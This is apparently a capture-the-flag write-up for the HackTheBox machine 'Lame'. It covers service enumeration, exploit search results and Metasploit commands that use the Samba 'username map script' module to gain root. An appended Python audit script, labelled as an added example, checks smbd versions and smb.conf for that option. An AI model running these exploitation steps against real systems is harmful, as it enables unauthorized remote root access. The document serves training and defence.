Lame

'''
ENUMERATION:

NMAP:
port 21, 22, 139, 445, 3632

SERVICES:
- 21 vsftpd 2.3.4
- 22 OpenSSH 4.7p1 Debian 8ubuntu1
- 139, 445 Samba smbd 3.0.20-Debian
- 3632 distccd v1

SEARCHSPLOIT:
kali@kali:~/HTB$ searchsploit samba 3.0.20
-------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                  |  Path
-------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                          | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                           | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow                                           | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                   | linux_x86/dos/36741.py
-------------------------------------------------------------------------------- ---------------------------------

METASPLOIT:
search samba 3.0.20
14  exploit/multi/samba/usermap_script  2007-05-14  excellent  No  Samba "username map script" Command Execution
'''

EXPLOIT:
$ msfconsole
msf> search samba 3.0.20
msf> use 14 (search result)
msf> set rhost 10.10.10.3
msf> exploit
'''

PRIVESC:
already had root - found user and root flags
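
DEFENDER CHECK (added example, not part of the original notes): a host-side audit for the Samba finding above. It flags an smbd version inside the range printed in the searchsploit title and any `username map script` setting in smb.conf. The function names and the sample config are constructed for illustration.

```python
import re

# Affected range as printed in the searchsploit title on this page.
LOW, HIGH = "3.0.20", "3.0.25rc3"

def version_key(v):
    """Sortable key; a release candidate sorts before its final release."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", v)
    if not m:
        raise ValueError(f"unparsed Samba version: {v!r}")
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), 0 if rc else 1, int(rc or 0))

def smb_conf_params(text):
    """Yield (section, name, value). smb.conf(5) ignores case and whitespace
    in parameter names, so names are lowercased with whitespace removed."""
    section, pending = None, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not pending and (not line or line[0] in "#;"):
            continue                      # blank line or comment
        line, pending = pending + line, ""
        if line.endswith("\\"):           # trailing backslash continues the line
            pending = line[:-1]
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif "=" in line:
            name, value = line.split("=", 1)
            yield section, re.sub(r"\s+", "", name).lower(), value.strip()

def audit(banner_version, conf_text):
    """Return findings for the version range and the map-script option."""
    findings = []
    if version_key(LOW) <= version_key(banner_version) < version_key(HIGH):
        findings.append(f"smbd {banner_version} is inside the range {LOW} < {HIGH}")
    for section, name, value in smb_conf_params(conf_text):
        if name == "usernamemapscript" and value:
            findings.append(f"[{section}] username map script = {value}")
    return findings

# Constructed sample config, not taken from the target host.
SAMPLE_CONF = """\
# constructed sample
[global]
   workgroup = WORKGROUP
   Username  Map Script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
"""

if __name__ == "__main__":
    print("\n".join(audit("3.0.20-Debian", SAMPLE_CONF)))
```
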